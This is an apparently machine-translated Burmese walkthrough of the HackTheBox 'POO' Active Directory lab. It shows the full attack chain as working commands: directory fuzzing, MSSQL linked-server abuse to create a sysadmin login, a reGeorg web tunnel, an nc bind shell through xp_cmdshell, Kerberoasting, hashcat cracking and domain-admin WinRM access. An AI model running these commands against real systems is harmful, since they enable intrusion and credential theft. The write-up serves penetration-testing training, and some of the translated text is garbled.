HackTheBoxendgame ဓါတ်ခွဲခန်း၏ ပရော်ဖက်ရှင်နယ် ထိုးစစ်ကို ဖြတ်ကျော်ခြင်း။ Pentest Active Directory

ဤဆောင်းပါးတွင်၊ ကျွန်ုပ်တို့သည် စက်တစ်ခုသာမက ဆိုက်မှ ဓာတ်ခွဲခန်းအသေးစားတစ်ခုလုံး၏ လမ်းကြောင်းကို ပိုင်းခြားစိတ်ဖြာပါမည်။ HackTheBox.

ဖော်ပြချက်တွင်ဖော်ပြထားသည့်အတိုင်း POO သည် သေးငယ်သော Active Directory ပတ်ဝန်းကျင်တွင် တိုက်ခိုက်မှုအဆင့်အားလုံးတွင် စွမ်းရည်များကို စမ်းသပ်ရန် ဒီဇိုင်းထုတ်ထားသည်။ ရည်မှန်းချက်မှာ ရရှိနိုင်သော host ကို အလျှော့အတင်းလုပ်ရန်၊ အခွင့်ထူးများကို တိုးမြှင့်ရန်နှင့် လုပ်ငန်းစဉ်တွင် အလံ 5 ခုကို စုဆောင်းခြင်းဖြင့် ဒိုမိန်းတစ်ခုလုံးကို နောက်ဆုံးတွင် အပေးအယူလုပ်ရန်ဖြစ်သည်။

ဓာတ်ခွဲခန်းသို့ချိတ်ဆက်မှုသည် VPN မှတဆင့်ဖြစ်သည်။ သတင်းအချက်အလက်လုံခြုံရေးနှင့်ပတ်သက်သော တစ်စုံတစ်ရာကို သိရှိသူများနှင့် လျှို့ဝှက်ကွန်ရက်သို့ သင်ဝင်ရောက်လာသောကြောင့် သင့်အတွက် အရေးကြီးသောဒေတာများရှိသည့် ကွန်ပျူတာမှ သို့မဟုတ် သင့်အတွက် အရေးကြီးသောဒေတာများရှိသည့် နေရာမှ ချိတ်ဆက်ခြင်းမပြုရန် အကြံပြုလိုပါသည်။

အဖွဲ့အစည်းဆိုင်ရာအချက်အလက်များ
ဆောင်းပါးအသစ်များ၊ ဆော့ဖ်ဝဲလ်နှင့် အခြားအချက်အလက်များအကြောင်း သင်သိရှိနိုင်စေရန်အတွက် ကျွန်ုပ်ဖန်တီးခဲ့သည်။ ကြေးနန်းချန်နယ် и မည်သည့်ကိစ္စရပ်ကိုမဆို ဆွေးနွေးရန် အဖွဲ့ IIKB ၏ဧရိယာ၌။ သင်၏ကိုယ်ရေးကိုယ်တာတောင်းဆိုမှုများ၊ မေးခွန်းများ၊ အကြံပြုချက်များနှင့် အကြံပြုချက်များလည်းဖြစ်သည်။ ငါကြည့်ပြီး လူတိုင်းကို အကြောင်းပြန်မယ်။.

အချက်အလက်အားလုံးကို ပညာရေးဆိုင်ရာ ရည်ရွယ်ချက်အတွက်သာ ပံ့ပိုးပေးပါသည်။ ဤစာတမ်းကို ရေးသားသူသည် ဤစာတမ်းကို လေ့လာခြင်းကြောင့် ရရှိသော အသိပညာနှင့် နည်းလမ်းများကို အသုံးပြုခြင်းကြောင့် မည်သူ့ကိုမျှ ထိခိုက်နစ်နာမှုများအတွက် တာဝန်မရှိဟု ယူဆပါသည်။

မိတ်ဆက်ခြင်း

ဤနောက်ဆုံးဂိမ်းတွင် စက်နှစ်ခုပါဝင်ပြီး အလံ 5 ခုပါရှိသည်။

ရရှိနိုင်သော host ၏ ဖော်ပြချက်နှင့် လိပ်စာကိုလည်း ပေးထားပါသည်။

စတင်ကြစို့!

Recon အလံ

ဒီစက်မှာ /etc/hosts မှာ ထည့်ထားတဲ့ IP လိပ်စာ 10.13.38.11 ရှိတယ်။
10.13.38.11 poo.htb

ပထမအဆင့်မှာ open ports များကို scan ဖတ်ရန်ဖြစ်သည်။ nmap ဖြင့် port အားလုံးကို scan လုပ်ရန် အချိန်အတော်ကြာသောကြောင့် ၎င်းကို masscan ဖြင့် အရင်လုပ်ပါမည်။ ကျွန်ုပ်တို့သည် 0pps ဖြင့် tun500 interface မှ TCP နှင့် UDP port အားလုံးကို စကင်န်ဖတ်ပါသည်။

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

ယခု၊ ဆိပ်ကမ်းများပေါ်တွင်လည်ပတ်သောဝန်ဆောင်မှုများအကြောင်းအသေးစိတ်အချက်အလက်များကိုရယူရန် -A ရွေးချယ်မှုဖြင့်စကင်န်တစ်ခုကိုလုပ်ဆောင်ကြပါစို့။

nmap -A poo.htb -p80,1433

ထို့ကြောင့် ကျွန်ုပ်တို့တွင် IIS နှင့် MSSQL ဝန်ဆောင်မှုများရှိသည်။ ဤကိစ္စတွင်၊ ကျွန်ုပ်တို့သည် ဒိုမိန်းနှင့် ကွန်ပျူတာ၏ စစ်မှန်သော DNS အမည်ကို ရှာဖွေပါမည်။ ဝဘ်ဆာဗာတွင်၊ ကျွန်ုပ်တို့အား IIS ပင်မစာမျက်နှာမှ ကြိုဆိုပါသည်။

လမ်းညွှန်များကို ထပ်ခါတလဲလဲ ကြည့်ရအောင်။ ဒီအတွက် ငါ gobuster သုံးတယ်။ ကန့်သတ်ဘောင်များတွင် ကျွန်ုပ်တို့စိတ်ဝင်စားသော 128 (-t)၊ URL (-u)၊ အဘိဓာန် (-w) နှင့် (-x) တို့ကို ကျွန်ုပ်တို့စိတ်ဝင်စားသော လိုင်းများနံပါတ်များကို သတ်မှတ်ပေးပါသည်။

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

ထို့ကြောင့်၊ ကျွန်ုပ်တို့တွင် /admin directory အတွက် HTTP စစ်မှန်ကြောင်းအထောက်အထားပြခြင်းအပြင် .DS_Store desktop ဝန်ဆောင်မှုသိုလှောင်မှုဖိုင်ကို ရရှိနိုင်ပါသည်။ .DS_Store သည် ဖိုင်စာရင်း၊ အိုင်ကွန်တည်နေရာ၊ ရွေးချယ်ထားသော နောက်ခံပုံကဲ့သို့သော ဖိုင်တွဲတစ်ခုအတွက် အသုံးပြုသူဆက်တင်များကို သိမ်းဆည်းထားသည့် ဖိုင်များဖြစ်သည်။ ထိုကဲ့သို့သောဖိုင်သည် ဝဘ်ဆော့ဖ်ဝဲရေးသားသူများ၏ ဝဘ်ဆာဗာလမ်းညွှန်တွင် အဆုံးသတ်နိုင်သည်။ ထို့ကြောင့်၊ ကျွန်ုပ်တို့သည် လမ်းညွှန်၏ အကြောင်းအရာများနှင့် ပတ်သက်သော အချက်အလက်များကို ရရှိပါသည်။ ဒီအတွက် သင်သုံးနိုင်ပါတယ်။ DS_Store စာရေးကိရိယာ.

python3 dsstore_crawler.py -i http://poo.htb/

လမ်းညွှန်၏ အကြောင်းအရာများကို ကျွန်ုပ်တို့ ရရှိပါသည်။ ဤနေရာတွင် စိတ်ဝင်စားစရာအကောင်းဆုံးမှာ /dev directory သည် အကိုင်းအခက်နှစ်ခုတွင် အရင်းအမြစ်များနှင့် db ဖိုင်များကို မြင်တွေ့နိုင်သည် ။ သို့သော် ဝန်ဆောင်မှုသည် IIS ShortName တွင် အားနည်းနေပါက ဖိုင်နှင့် လမ်းညွှန်အမည်များ၏ ပထမစာလုံး 6 လုံးကို အသုံးပြုနိုင်ပါသည်။ ဤအားနည်းချက်ကို အသုံးပြု၍ စစ်ဆေးနိုင်ပါသည်။ IIS အတိုကောက်အမည် စကင်နာ.

ပြီးတော့ "poo_co" နဲ့စတဲ့ စာသားဖိုင်တစ်ခုကို ငါတို့တွေ့တယ်။ ဘာဆက်လုပ်ရမှန်းမသိဘဲ၊ "co" နဲ့ အစပြုတဲ့ စကားလုံးအားလုံးကို အဘိဓာန်အဘိဓာန်ကနေပဲ ရွေးလိုက်တယ်။

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

wfuzz ဖြင့် ထပ်ပြောပါ။

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

မှန်ကန်သောစကားလုံးကိုရှာပါ။ ကျွန်ုပ်တို့သည် ဤဖိုင်ကိုကြည့်သည်၊ အထောက်အထားများကို သိမ်းဆည်းသည် (DBNAME ကန့်သတ်ချက်ဖြင့် ဆုံးဖြတ်သည်၊ ၎င်းတို့သည် MSSQL မှဖြစ်သည်)။

ကျွန်တော်တို့ အလံကို လွှဲပြီး 20% တက်လာတယ်။

ဟမ်အလံ

MSSQL နဲ့ ချိတ်ဆက်ပြီး DBeaver ကို သုံးပါတယ်။

ဒီဒေတာဘေ့စ်မှာ စိတ်ဝင်စားစရာ ဘာမှမတွေ့ပါဘူး၊ SQL Editor တစ်ခုဖန်တီးပြီး အသုံးပြုသူတွေဘာတွေလဲဆိုတာ စစ်ဆေးကြည့်ရအောင်။

SELECT name FROM master..syslogins;

ကျွန်ုပ်တို့တွင် အသုံးပြုသူ နှစ်ဦးရှိသည်။ ကျွန်ုပ်တို့၏အခွင့်အရေးများကို စစ်ဆေးကြည့်ကြပါစို့။

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

ထို့ကြောင့် အခွင့်ထူးများ မရှိပါ။ လင့်ခ်ချိတ်ထားတဲ့ ဆာဗာတွေကို ကြည့်ရအောင်၊ ဒီနည်းပညာအကြောင်း အသေးစိတ်ရေးထားပါတယ်။ ဒီမှာ.

SELECT * FROM master..sysservers;

ဒါကြောင့် နောက်ထပ် SQL Server ကို ရှာတွေ့ပါတယ်။ openquery() ကို အသုံးပြု၍ ဤဆာဗာရှိ command များ၏လုပ်ဆောင်မှုကို စစ်ဆေးကြပါစို့

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

ပြီးတော့ query tree လည်းဆောက်လို့ရတယ်။

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

အမှန်မှာ ကျွန်ုပ်တို့သည် ချိတ်ဆက်ထားသောဆာဗာသို့ တောင်းဆိုချက်တစ်ခုပြုလုပ်သောအခါ၊ တောင်းဆိုချက်ကို အခြားအသုံးပြုသူ၏ ဆက်စပ်မှုတွင် လုပ်ဆောင်ပါသည်။ လင့်ခ်ချိတ်ထားသောဆာဗာတွင် ကျွန်ုပ်တို့လုပ်ဆောင်နေသည့် သုံးစွဲသူ၏အကြောင်းအရာကို ကြည့်ကြပါစို့။

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

ယခု ကျွန်ုပ်တို့နှင့် ချိတ်ဆက်ထားသော ဆာဗာမှ တောင်းဆိုချက်အား မည်သည့်အခြေအနေတွင် လုပ်ဆောင်ထားသည်ကို ကြည့်ကြပါစို့။

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

ထို့ကြောင့်၊ ၎င်းသည် အခွင့်ထူးများအားလုံးရှိရမည့် DBO အကြောင်းအရာတစ်ခုဖြစ်သည်။ လင့်ခ်ချိတ်ထားသောဆာဗာမှ တောင်းဆိုမှုတစ်ခုအတွက် အခွင့်ထူးများကို စစ်ဆေးကြပါစို့။

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

သင်တွေ့မြင်ရသည့်အတိုင်း ကျွန်ုပ်တို့တွင် အခွင့်ထူးများအားလုံးရှိသည်။ ငါတို့ရဲ့ အက်ဒ်မင်ကို ဒီလိုဖန်တီးလိုက်ကြရအောင်။ ဒါပေမယ့် သူတို့က သူတို့ကို openquery ကနေ ခွင့်မပြုဘူး၊ EXECUTE AT နဲ့ လုပ်ကြည့်ရအောင်။

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

ယခု ကျွန်ုပ်တို့သည် အသုံးပြုသူအသစ်၏ အထောက်အထားများနှင့် ချိတ်ဆက်ပြီး အလံဒေတာဘေ့စ်အသစ်ကို ကြည့်ရှုလေ့လာပါ။

ငါတို့ ဒီအလံကို လွှဲပြီး ရှေ့ဆက်သွားမယ်။

နောက်ခံအလံ

MSSQL ကိုအသုံးပြု၍ shell ကိုရယူကြပါစို့၊ ကျွန်ုပ်သည် impacket package မှ mssqlclient ကိုအသုံးပြုနေပါသည်။

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

စကားဝှက်များရယူရန် လိုအပ်ပြီး ကျွန်ုပ်တို့ ပထမဆုံးတွေ့ဖူးသည့်အရာမှာ ဆိုက်ဖြစ်သည်။ ထို့ကြောင့်၊ ကျွန်ုပ်တို့သည် ဝဘ်ဆာဗာ config တစ်ခု လိုအပ်သည် (ကျွန်ုပ်တို့ အဆင်ပြေသော shell ကို ပစ်မထားနိုင်သောကြောင့် firewall အလုပ်လုပ်ပုံရသည်)။

သို့သော် ဝင်ရောက်ခွင့်ကို ငြင်းပယ်ထားသည်။ ကျွန်ုပ်တို့သည် MSSQL မှဖိုင်ကိုဖတ်ရှုနိုင်သော်လည်း၊ ကျွန်ုပ်တို့သည်မည်သည့်ပရိုဂရမ်းမင်းဘာသာစကားများကို configure လုပ်ထားသည်ကိုသိရန်လိုအပ်သည်။ ပြီးတော့ MSSQL directory မှာ Python ရှိတယ်ဆိုတာ သိလိုက်ရတယ်။

ထို့နောက် web.config ဖိုင်ကိုဖတ်ရန် ပြဿနာမရှိပါ။

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

တွေ့ရှိသောအထောက်အထားများဖြင့် /admin သို့သွား၍ အလံကိုယူပါ။

ခြေကုပ်အလံ

အမှန်မှာ၊ firewall အသုံးပြုရာတွင် အဆင်မပြေမှုအချို့ရှိသော်လည်း ကွန်ရက်ဆက်တင်များမှတစ်ဆင့် IPv6 ပရိုတိုကောကို အသုံးပြုထားသည်ကို သတိပြုမိပါသည်။

ဤလိပ်စာကို /etc/hosts သို့ထည့်ပါ။
dead:babe::1001 poo6.htb
host ကို ထပ်စကင်န်ဖတ်ကြည့်ရအောင်၊ ဒါပေမယ့် ဒီတစ်ခါ IPv6 ကျော်သွားပါပြီ။

WinRM ဝန်ဆောင်မှုကို IPv6 ကျော်ဖြင့် ရနိုင်ပါသည်။ တွေ့ရှိသောအထောက်အထားများနှင့် ချိတ်ဆက်ကြပါစို့။

ဒက်စတော့တွင် အလံတစ်ခု ပါ၀င်ပြီး ၎င်းကို လက်လွှဲလိုက်ပါ။

P00ned အလံ

ကင်းထောက်ပြီးရင် အိမ်ရှင်တို့နဲ့ ပဲစေ့ ထူးထူးခြားခြား ဘာမှမတွေ့ဘူး။ ထို့နောက် အထောက်အထားများကို ထပ်မံရှာဖွေရန် ဆုံးဖြတ်ခဲ့သည် (ဤအကြောင်းအရာကို ကျွန်တော်လည်း ရေးသားခဲ့သည်။ ဆောင်းပါး) ဒါပေမယ့် WinRM ကတစ်ဆင့် စနစ်ကနေ SPNs အားလုံးကို ကျွန်တော် မရခဲ့ပါဘူး။

setspn.exe -T intranet.poo -Q */*

MSSQL မှတဆင့် command ကို run ကြပါစို့။

ဤနည်းအားဖြင့်၊ သုံးစွဲသူများ၏ p00_hr နှင့် p00_adm တို့၏ SPN ကို ရရှိသည်၊ ဆိုလိုသည်မှာ ၎င်းတို့သည် Kerberoasting ကဲ့သို့သော တိုက်ခိုက်မှုကို ခံနိုင်ရည်ရှိနိုင်သည်ဟု ဆိုလိုသည်။ အတိုချုပ်အားဖြင့်၊ ကျွန်ုပ်တို့သည် ၎င်းတို့၏ စကားဝှက်များ၏ hashes ကို ရနိုင်သည်။

ပထမဦးစွာ သင်သည် MSSQL အသုံးပြုသူကိုယ်စား တည်ငြိမ်သော shell ကိုရယူရန် လိုအပ်သည်။ သို့သော် ကျွန်ုပ်တို့သည် ဝင်ရောက်ခွင့်ကို ကန့်သတ်ထားသောကြောင့်၊ ကျွန်ုပ်တို့သည် ဆိပ်ကမ်း 80 နှင့် 1433 မှတဆင့် host နှင့်သာ ချိတ်ဆက်မှုရှိသည်။ သို့သော် port 80 ကိုဖြတ်၍ ဥမင်လိုဏ်ခေါင်းအသွားအလာဖြစ်နိုင်သည်။ ဒီအတွက် ကျွန်တော်တို့ သုံးပါတယ်။ နောက်လျှောက်လွှာ. ဝဘ်ဆာဗာ၏ ပင်မလမ်းညွှန်သို့ tunnel.aspx ဖိုင်ကို အပ်လုဒ်လုပ်ကြပါစို့ - C: inetpubwwwroot။

သို့သော် ၎င်းကိုဝင်ရောက်ရန်ကြိုးစားသောအခါတွင် 404 error တစ်ခုရရှိသည်။ ဆိုလိုသည်မှာ *.aspx ဖိုင်များကို လုပ်ဆောင်မည်မဟုတ်ပါ။ ဤတိုးချဲ့မှုများဖြင့် ဖိုင်များလည်ပတ်စေရန် ASP.NET 4.5 ကို အောက်ပါအတိုင်း ထည့်သွင်းပါ။

dism /online /enable-feature /all /featurename:IIS-ASPNET45

ယခုလည်း၊ tunnel.aspx ကိုဝင်ရောက်သည့်အခါ အရာအားလုံးသည် အဆင်သင့်ဖြစ်ပြီဟု ကျွန်ုပ်တို့ရရှိခဲ့ပါသည်။

အသွားအလာကို ထပ်ဆင့်ပို့မည့် အပလီကေးရှင်း၏ client အပိုင်းကို စတင်ကြပါစို့။ ကျွန်ုပ်တို့သည် ဆိပ်ကမ်း 5432 မှ အသွားအလာအားလုံးကို ဆာဗာသို့ ပေးပို့ပါမည်။

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

ကျွန်ုပ်တို့သည် ကျွန်ုပ်တို့၏ proxy မှတဆင့် မည်သည့် application ၏အသွားအလာကိုမဆိုပေးပို့ရန် proxychains ကိုအသုံးပြုပါသည်။ ဤပရောက်စီကို /etc/proxychains.conf ဖွဲ့စည်းမှုပုံစံဖိုင်သို့ ထည့်ကြပါစို့။

အခု ပရိုဂရမ်ကို ဆာဗာမှာ တင်လိုက်ကြရအောင် ပိုက်ကွန်တည်ငြိမ်သော bind shell နှင့် script ကိုလုပ်ပါမည်။ Kerberoast ကိုခေါ်ပါ။Kerberoasting တိုက်ခိုက်မှုကို ကျွန်ုပ်တို့ လုပ်ဆောင်ပါမည်။

ယခု၊ MSSQL မှတဆင့်၊ ကျွန်ုပ်တို့သည် နားဆင်သူကို စတင်လိုက်ပါ။

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

ကျွန်ုပ်တို့သည် ကျွန်ုပ်တို့၏ proxy မှတဆင့် ချိတ်ဆက်ပါသည်။

proxychains rlwrap nc poo.htb 4321

ပြီးတော့ hashes တွေကို ရယူလိုက်ကြရအောင်။

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

ထို့နောက်၊ ဤ hashes များကို ထပ်လောင်းရန် လိုအပ်သည်။ Rockyou မှာ စကားဝှက်ဒေတာအဘိဓာန်မရှိလို့၊ Seclists မှာ ပေးထားတဲ့ စကားဝှက်အဘိဓာန်အားလုံးကို ကျွန်တော်အသုံးပြုခဲ့ပါတယ်။ စာရင်းကောက်ယူရန်အတွက် ကျွန်ုပ်တို့သည် hashcat ကိုအသုံးပြုသည်။

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

ပြီးတော့ စကားဝှက်နှစ်ခုလုံးကို Dutch_passwordlist.txt အဘိဓာန်မှာ ပထမ၊ ဒုတိယကို Keyboard-Combinations.txt မှာ တွေ့ပါတယ်။

ထို့ကြောင့် ကျွန်ုပ်တို့တွင် အသုံးပြုသူ သုံးဦးရှိသည်၊ ကျွန်ုပ်တို့သည် ဒိုမိန်းထိန်းချုပ်ကိရိယာသို့ သွားကြသည်။ သူ့လိပ်စာကို အရင်ရှာကြည့်ရအောင်။

ကောင်းပါတယ်၊ domain controller ရဲ့ IP လိပ်စာကို လေ့လာပြီးပါပြီ။ ဒိုမိန်းအသုံးပြုသူအားလုံးအပြင် ၎င်းတို့ထဲမှ မည်သူသည် စီမံခန့်ခွဲသူဖြစ်သည်ကို ရှာဖွေကြပါစို့။ အချက်အလက်ရယူရန် ဇာတ်ညွှန်းကို ဒေါင်းလုဒ်လုပ်ရန် PowerView.ps1။ ထို့နောက် ကျွန်ုပ်တို့သည် မကောင်းသော-winrm ကို အသုံးပြု၍ လမ်းညွှန်ကို -s ကန့်သတ်ချက်ရှိ ဇာတ်ညွှန်းဖြင့် သတ်မှတ်ပေးပါမည်။ ပြီးမှ PowerView script ကိုတင်လိုက်ပါ။

ယခု ကျွန်ုပ်တို့သည် ၎င်း၏လုပ်ဆောင်ချက်အားလုံးကို အသုံးပြုနိုင်ပါပြီ။ p00_adm အသုံးပြုသူသည် အခွင့်ထူးခံအသုံးပြုသူနှင့်တူသည်၊ ထို့ကြောင့် ကျွန်ုပ်တို့သည် ၎င်း၏အခြေအနေတွင် အလုပ်လုပ်ပါမည်။ ဤအသုံးပြုသူအတွက် PSCredential object တစ်ခုကို ဖန်တီးကြပါစို့။

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

ယခု ကျွန်ုပ်တို့ Creds သတ်မှတ်သည့် Powershell အမိန့်အားလုံးကို p00_adm ကိုယ်စား လုပ်ဆောင်ပါမည်။ အသုံးပြုသူများစာရင်းနှင့် AdminCount ရည်ညွှန်းချက်ကို ဖော်ပြကြပါစို့။

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

ထို့ကြောင့်၊ ကျွန်ုပ်တို့၏အသုံးပြုသူသည် အမှန်တကယ် အခွင့်ထူးခံဖြစ်သည်။ သူဘယ်အဖွဲ့လဲဆိုတာ ကြည့်လိုက်ရအောင်။

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

အသုံးပြုသူသည် ဒိုမိန်းစီမံခန့်ခွဲသူဖြစ်ကြောင်း နောက်ဆုံးတွင် ကျွန်ုပ်တို့ အတည်ပြုပါသည်။ ၎င်းသည် ဒိုမိန်းထိန်းချုပ်ကိရိယာသို့ အဝေးမှဝင်ရောက်ရန် အခွင့်အရေးပေးသည်။ ကျွန်ုပ်တို့၏ ဥမင်လိုဏ်ခေါင်းကို အသုံးပြု၍ WinRM ဖြင့် ဝင်ရောက်ရန် ကြိုးစားကြပါစို့။ evil-winrm ကိုအသုံးပြုသောအခါ reGeorg မှထုတ်ပေးသောအမှားများကြောင့်ကျွန်ုပ်စိတ်ရှုပ်ထွေးခဲ့သည်။

နောက်တစ်ခု၊ ပိုလွယ်တဲ့တစ်ခုကို သုံးတယ်၊ ဇာတ်ညွှန်း WinRM သို့ချိတ်ဆက်ရန်။ ချိတ်ဆက်မှုဘောင်များကိုဖွင့်ပြီး ပြောင်းလဲပါ။

ကျွန်တော်တို့ ချိတ်ဆက်ဖို့ ကြိုးစားပြီး စနစ်ထဲမှာ ရှိနေတယ်။

ဒါပေမယ့် အလံမရှိဘူး။ ထို့နောက် အသုံးပြုသူကို ကြည့်ရှုပြီး desktop များကို စစ်ဆေးပါ။

mr3ks တွင်ကျွန်ုပ်တို့အလံကိုတွေ့ပြီးဓာတ်ခွဲခန်းသည် 100% ပြီးစီးသည်။

ဒါပါပဲ။ အကြံပြုချက်အနေဖြင့် သင်သည် ဤဆောင်းပါးမှ အသစ်အဆန်းတစ်ခုခု သင်ယူခြင်းရှိ၊ မရှိနှင့် ၎င်းသည် သင့်အတွက် အသုံးဝင်သည်ဖြစ်စေ မှတ်ချက်ပေးပါ။

တွင်ကျွန်ုပ်တို့နှင့်ပူးပေါင်းနိုင်ပါသည်။ ကွေးနနျးစာ. အဲဒီ့မှာ စိတ်ဝင်စားစရာကောင်းတဲ့ ပစ္စည်းတွေ၊ ပေါင်းစပ်သင်တန်းတွေအပြင် ဆော့ဖ်ဝဲတွေကိုပါ သင်ရှာတွေ့နိုင်ပါတယ်။ IT နယ်ပယ်များစွာကို နားလည်သူများရှိမည့် အသိုက်အဝန်းတစ်ခုကို စုစည်းလိုက်ရအောင်၊ ထို့နောက် IT နှင့် သတင်းအချက်အလက် လုံခြုံရေးဆိုင်ရာ ပြဿနာများအတွက် အချင်းချင်း အမြဲကူညီပေးနိုင်ပါသည်။

source: www.habr.com